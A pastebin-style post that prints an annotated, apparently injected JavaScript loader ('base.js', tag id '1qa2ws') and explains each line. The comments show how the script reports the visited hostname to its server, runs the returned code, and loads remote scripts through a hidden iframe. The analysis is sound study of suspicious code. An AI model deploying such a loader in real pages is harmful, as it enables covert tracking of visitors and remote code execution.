
The Mysterious Script

a guest
Mar 30th, 2019
  1. (function() {
  2.     try {
  3.         top.tlbscdr = {}; // Creates a "tlbscdr" object on the top-level window (window.top), which makes it a page-wide global. Reference for window.top: https://www.w3schools.com/Jsref/prop_win_top.asp
  4.         top.tlbscdr.jscdr = []; // An array used as a small log; entries are pushed at lines 6 and 170.
  5.         var d = new Date; // Current date/time, stored as "btime" in the log entry below.
  6.         top.tlbscdr.jscdr.push({
  7.             jsname: "base.js",
  8.             jsexetype: "1",
  9.             btime: d
  10.         }); // First log entry (jsexetype "1"), pushed before the main work; the matching jsexetype "2" entry is pushed at line 170.
  11.         // l is a local function (var is scoped to this IIFE). It is only invoked from the load handlers that n() installs below, i.e. after the remote script created at line 123 has loaded.
  12.         var l = function() {
  13.                 // top.tlbs is not assigned anywhere in this file. Presumably it is set by the remote script requested at line 132 - that response is not part of this listing, so this cannot be confirmed here.
  14.                 // The function has no return statement, so it always returns `undefined`.
  15.                 if (top.tlbs && !top.tlbsEmbed) {
  16.                     top.tlbsEmbed = !0; // !0 is the minified form of `true`. Because the condition above tests !top.tlbsEmbed, this branch runs at most once.
  17.  
  18.                     /**
  19.                      * The for-initialiser declares four vars: b = the <head> of the TOP document, a = top.tlbs.iframejs split on "|", c = the opening of an HTML string, g = the loop index.
  20.                      *
  21.                      * Every reference goes through "top", so the resources are attached to the top-level page even if this code were running inside a frame.
  22.                      *
  23.                      * var is function-scoped, so these b, a and c are locals of l. They are separate from the b, a and c of the anonymous function at line 94; nothing is being overridden.
  24.                      *
  25.                      * c accumulates markup that is written into a hidden iframe at lines 53-59. None of these variables are visible outside l.
  26.                      *
  27.                      * The content of top.tlbs.iframejs is not visible here; the loop treats it as a "|"-separated list of URLs and visits each entry once.
  28.                      *
  29.                      */
  30.                     for (var b = top.document.getElementsByTagName("head")[0], a = top.tlbs.iframejs.split("|"), c = '<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />', g = 0; g < a.length; g++)
  31.                         /**
  32.                          * The content of top.tlbs.iframejs is not shown here. From the way it is parsed it seems to look something like this (constructed example):
  33.                          *
  34.                          * "https://google.com/jquery.js|https://bootstrap.com/bootstrap.js|https://react.com/react.js"
  35.                          *
  36.                          * indexOf returns -1 when the substring is absent, so "-1 != a[g].indexOf(...)" is a substring test, not an array-key check: entries containing ".js" become <script defer> tags in the iframe markup, entries containing ".css" become <link> elements in the top document's <head>.
  37.                          * The URLs are concatenated into markup without validation or escaping, so whoever controls top.tlbs.iframejs decides which scripts run. Which files are actually loaded cannot be determined from this listing.
  38.                          */
  39.                         if (-1 != a[g].indexOf(".js")) c += '<script src="' + a[g] + '" defer charset="UTF-8">\x3c/script>';
  40.                         else if (-1 != a[g].indexOf(".css")) {
  41.                           /**
  42.                            * Stylesheets are handled differently from scripts: the <link> is appended to the top document's <head> (b), so the CSS applies to the visible page rather than to the hidden iframe.
  43.                            */
  44.                         var e =
  45.                             document.createElement("link");
  46.                         e.rel = "stylesheet";
  47.                         e.type = "text/css";
  48.                         e.charset = "UTF-8";
  49.                         e.href = a[g];
  50.                         b.appendChild(e) // Appends the <link> to the <head> of the top document.
  51.                     }
  52.                     c += "</head></html>"; // Closes the markup string.
  53.                     a = document.createElement("iframe"); // a is reused: it now holds a new, empty iframe element.
  54.                     a.style.display = "none"; // The iframe is invisible to the user. Legitimate widgets also use hidden iframes, so this is a signal worth noting rather than proof of malice on its own.
  55.                     document.body.appendChild(a); // Attaches the hidden iframe to the current page's <body>.
  56.                     try {
  57.                         // Writes the generated markup into the iframe's document, so the listed scripts load inside the iframe. The iframe has no src, so it shares the page's origin and its scripts can still reach the page through top/parent.
  58.                         var d = a.contentWindow.document;
  59.                         d.write(c);
  60.                         d.close() // close() ends the document stream opened by write(), so the iframe document can finish loading (the script tags are marked defer).
  61.                     } catch (h) {
  62.                         // Fallback for when touching the iframe's document throws. If the user agent contains "MSIE" and the page URL contains www.people.com.cn or www.caijing.com.cn, it gives up silently; why those two sites are excluded is not visible here.
  63.                         if (/MSIE/g.test(navigator.userAgent) && (0 <= location.href.indexOf("www.people.com.cn") || 0 <= location.href.indexOf("www.caijing.com.cn"))) return;
  64.                         /**
  65.                          * This does not redirect or wipe the visible page. The javascript: URL is assigned to the hidden iframe's src, so document.open/write/close run inside the iframe: it sets the iframe's document.domain to the parent's value and then writes the same markup "c".
  66.                          * Presumably a workaround for older IE, where a blank iframe becomes inaccessible once the parent page has set document.domain - TODO confirm. Note that c and document.domain are spliced into a single-quoted JS string without escaping.
  67.                          *  */
  68.                         a.src = "javascript:void((function(){document.open();document.domain='" + document.domain +
  69.                             "';document.write('" + c + "');document.close()})())"
  70.                     }
  71.                     // c is reused again: from here on it holds a new <style> element.
  72.                     c = document.createElement("style");
  73.                     c.type = "text/css";
  74.                     // These selectors are AngularJS's standard ng-cloak / ng-hide rules, which suggests the loaded scripts use AngularJS (inferred; those scripts are not shown).
  75.                     c.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}';
  76.                     // Adds the <style> to the top document's <head>.
  77.                     b.appendChild(c)
  78.                 } else top.nobar = !0 // Sets top.nobar to true (!0), not false. Nothing in this file reads it; presumably it is a flag for the remotely loaded scripts.
  79.             },
  80.             // n is the second variable of the var statement that started at line 12, so it is also local to this IIFE.
  81.             // It is called once, at line 124, with a freshly created <script> element, and arranges for l() to run when that script has loaded.
  82.             n = function(b) {
  83.                 // Script-load detection for two browser families: if the element exposes readyState (older IE), wait until onreadystatechange reports "loaded" or "complete", clear the handler and call l(); otherwise use the standard onload event.
  84.                 b.readyState ? b.onreadystatechange = function() {
  85.                     if ("loaded" == b.readyState || "complete" == b.readyState) b.onreadystatechange = null, l()
  86.                 } : b.onload = function() { // Else-branch of the ternary: browsers without readyState on the element call l() from onload.
  87.                     l()
  88.                 }
  89.  
  90.                 // Either way, l() runs only after the script element passed in has finished loading.
  91.             };
  92.         // parent == self is true only when this window is not inside a frame, so the function below runs only in a top-level page. "x && function(){...}()" is the minified form of "if (x) { ... }".
  93.         parent ==
  94.             self && function() {
  95.               /**
  96.                * The for-initialiser sets up: b = document, a = the element with id "1qa2ws", c = that element's src attribute.
  97.                * The element is presumably the <script> tag that loaded this file, since c is later used as the base URL of the server to call back (inferred; the tag itself is not shown).
  98.                *
  99.                * d = the <head> of the document (document.head, or the first <head> found by getElementsByTagName as a fallback).
  100.                * a is then reassigned to the element's attribute list, e = the number of attributes,
  101.                * f = "" (the query string being built), h = 0 (the loop index).
  102.                *
  103.                * All of these are var declarations, so they are local to this anonymous function; they are not visible outside it.
  104.                *
  105.                * The loop visits each attribute of the single #1qa2ws element once (h runs from 0 to e - 1).
  106.                *
  107.                * /^(src|type|id)$/.test(name) || (...) : the part after || runs only when the test is FALSE, i.e. for every attribute whose name is NOT src, type or id.
  108.                *
  109.                * So the loop copies every other attribute of the element into f as "&name=value"; src, type and id are skipped.
  110.                *
  111.                * Constructed example (host and attribute names invented for illustration):
  112.                *  <script id="1qa2ws" type="text/javascript" src="http://host.example/www/base.js" foo="1" bar="2">
  113.                *
  114.                *
  115.                * After the loop, f would be:
  116.                *  "&foo=1&bar=2"
  117.                *
  118.                * There is no loop over several elements with the same id: getElementById returns a single element,
  119.                * and the loop iterates over that element's attributes.
  120.                */
  121.                 for (var b = document, a = b.getElementById("1qa2ws"), c = a.getAttribute("src"), d = b.head || b.getElementsByTagName("head")[0], a = a.attributes, e = a.length, f = "", h = 0; h < e; h++) /^(src|type|id)$/.test(a[h].name) || (f = f + "&" + a[h].name + "=" + a[h].value);
  122.                 a = f; // a is reused once more: it now holds the query string built from the extra attributes.
  123.                 s = b.createElement("script"); // s is assigned without var and is not declared anywhere in this listing, so in non-strict code it becomes an implicit global (window.s).
  124.                 n(s); // Installs the load handlers on s so that l() runs once s has loaded.
  125.                 top.apptlbs = {}; // Another global on the top window; it receives appkey at line 161.
  126.                 s.charset = "UTF-8";
  127.                 b = (new Date).getTime(); // b is reused: now the current time in milliseconds, sent as the "time" parameter.
  128.                 c = c.split("www/")[0]; // c is still the src string read at line 121 (not a style object). This keeps only the part before the first "www/", i.e. the base URL of the server that served this script.
  129.                 // e is reused: host[:port] of the top-level page being viewed, e.g. "localhost:8000"; empty string if top.window.location is falsy.
  130.                 e = top.window.location ? top.window.location.hostname + (top.window.location.port ? ":" + top.window.location.port : "") : "";
  131.                 // s has no src until now. The request goes to the script's own server (c) and carries the timestamp, that server's base URL again (tlbsip), the visited site's host (website) and the extra tag attributes (a).
  132.                 s.src = c + "get?time=" + b + "&tlbsip=" +
  133.                     c + "&website=" + e + encodeURI(a);
  134.  
  135.                 /**
  136.                  * Constructed example: if the tag's src was "http://host.example/www/base.js" and the page is localhost:8000, s.src becomes
  137.                  *
  138.                  * http://host.example/get?time=1553944877510&tlbsip=http://host.example/&website=localhost:8000&foo=1&bar=2
  139.                  *
  140.                  * So each page view where this runs reports the visited hostname and a timestamp to the script's server, and whatever that server returns is executed as script in the page. How the tag got into the page is not shown here; where it was not placed by the site owner, a script-src Content-Security-Policy allow-list would block this request.
  141.                  */
  142.                 var k;
  143.                 a: { // "a:" is a statement label (unrelated to the variable a); "break a" below exits this block.
  144.                     try {
  145.                       // Looks for an "appkey" parameter in the query string of the top-level page's URL.
  146.                         var l = top.window.location.search.substr(1).match(/(^|&)appkey=([^&]*)(&|$)/i);
  147.                         // match() returns null when there is no appkey parameter; otherwise capture group 2 is its value.
  148.                         if (null != l) {
  149.                             k = unescape(l[2]); // Decodes %XX escapes in the value (unescape is a deprecated API).
  150.                             break a // Leaves the labelled block with k set to the decoded value.
  151.                         }
  152.                         k = "";
  153.                         break a
  154.                     } catch (m) {} // Any error while reading the URL is swallowed; k then falls through to undefined on the next line.
  155.                     k = void 0
  156.                 }
  157.                 /**
  158.                  * Short-circuit chain, equivalent to: if (k is non-empty AND "http://" + e + "/" equals c) { append "&appkey=" + k to s.src; store k in top.apptlbs.appkey }.
  159.                  * In other words the appkey is forwarded only when the page is served from the same host as the script itself (k is appended without re-encoding). The <script> element is appended to <head> on the line after regardless, which is what starts the request.
  160.                  */
  161.                 k && "http://" + e + "/" == c && (s.src = s.src + "&appkey=" + k, top.apptlbs.appkey = k);
  162.                 d.appendChild(s)
  163.             }();
  164.         /**
  165.          * Second log entry (jsexetype "2"), pushed after the setup above has run. Together with the entry from line 6 it records two timestamps:
  166.          *    - they could be used to time the setup (inferred)
  167.          *    - nothing in this file reads or sends top.tlbscdr, so its actual use is not visible here
  168.          */
  169.         d = new Date;
  170.         top.tlbscdr.jscdr.push({
  171.             jsname: "base.js",
  172.             jsexetype: "2",
  173.             btime: d
  174.         })
  175.     } catch (m) {
  176.       /**
  177.        * Reached if anything in the try block throws (for example if #1qa2ws does not exist, so a.getAttribute fails at line 121).
  178.        */
  179.         document.getElementById("1qa2ws").getAttribute("src"); // The result is discarded, so this statement has no effect here; if the element is missing it throws again, this time uncaught.
  180.         var d = m.message, // d is reused: the text of the caught error.
  181.             d = d + ("&time=" + (new Date).getTime()), // Appends a timestamp, shaped like a query-string fragment.
  182.             f = document.createElement("script"); // Creates a <script> element; in this listing it is never given a src nor attached to the page.
  183.         f.onload = f.onreadystatechange = function() { // Load handler (same readyState/onload pattern as n): once loaded, clear the handlers and remove f from <body>.
  184.             this.readyState && "loaded" !== this.readyState && "complete" !== this.readyState || (f.onload = f.onreadystatechange = null, document.body.removeChild(f))
  185.  
  186.             // This looks like the remains of an error-reporting beacon: d is built but never used and f is never appended, so as shown nothing is sent. The listing may be incomplete.
  187.         }
  188.     }
  189. })(window); // window is passed in, but the function declares no parameter, so the argument is unused.